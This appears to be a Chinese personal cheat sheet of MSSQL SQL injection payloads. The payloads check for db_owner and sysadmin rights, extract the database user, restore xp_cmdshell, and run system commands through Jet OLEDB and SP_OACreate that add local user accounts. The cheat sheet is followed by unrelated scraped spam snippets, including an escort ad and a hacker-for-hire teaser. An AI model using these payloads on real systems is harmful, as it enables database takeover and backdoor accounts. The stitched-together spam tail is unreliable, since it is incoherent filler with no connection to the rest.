我记性不好,所以把常用的注入代码记录下来,有点乱,但对我来说,还算很有用,希望大家也会喜欢!
//看看是什么权限的
and 1=(Select IS_MEMBER('db_owner'))
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
//检测是否有读取某数据库的权限
and 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
数字类型
and char(124)%2Buser%2Bchar(124)=0
字符类型
' and char(124)%2Buser%2Bchar(124)=0 and ''='
搜索类型
' and char(124)%2Buser%2Bchar(124)=0 and '%'='
爆用户名
and user>0
' and user>0 and ''='
检测是否为SA权限
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
检测是不是MSSQL数据库
and exists (select * from sysobjects);--
检测是否支持多行
;declare @d int;--
恢复 xp_cmdshell
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
//-----------------------
// 执行命令
//-----------------------
首先开启沙盘模式:
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
然后利用jet.oledb执行系统命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell(cmd.exe /c net user admin admin1234 /add)')
执行命令
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
我们都知道,目前国家开放了二胎政策,所以有关孩子方面的需求是越来越多,再加上家长们对孩子们的重视,所以这方面的钱还是很好赚的。如果有想要创业的,不妨去考虑一下这方面。那么,有关孩子的赚钱项目有哪些?我...
找同伴游戏目标-明星上门厂家直销 伴游描述:最近有很多朋友在商务预约网后台留言,想了解关于找同伴游戏目标信息。于是小编通过百度、知乎、文库等途径,总结了以下关于找同伴游戏目标的全部内容。希望对大家有所...
一、联系方式哪里怎么找黑客 1、分包黑客网站首先,我们知道破坏网吧的客观环境,以了解网吧官员的实地平衡等等。联系方式哪里的大牛它们通常具有硬件和软件的先进知识,并且有能力通过创新来分析系统。黑客接单如...
太原王村南街鬼樓真相 至今有十幾條生命已經葬身在鬼樓之中千奇百怪的天下,是造物主的恩賜,還是我們自己也是這奇觀之一? 探索之謎網導讀:小編整理瞭關於“太原王村南街鬼樓真相 至今有十幾條生命已經葬...
简而言之,网络营销推广只有一个目的:获得更多的销售。我知道,这并不是一个开创性的启示,但是我们需要说出来,为讨论奠定基础并了解二次营销推广的目的。 传统上,在潜在客户面前投放广告是向全...
特朗普:我不想等到2024年,我想三周后就去白宫就职 【环球网报道 记者 侯佳欣】“如果我输了,我会是个非常有风度的输家。”据美国全国广播公司(NBC)报道,当地时间12月5日,美国总统特朗...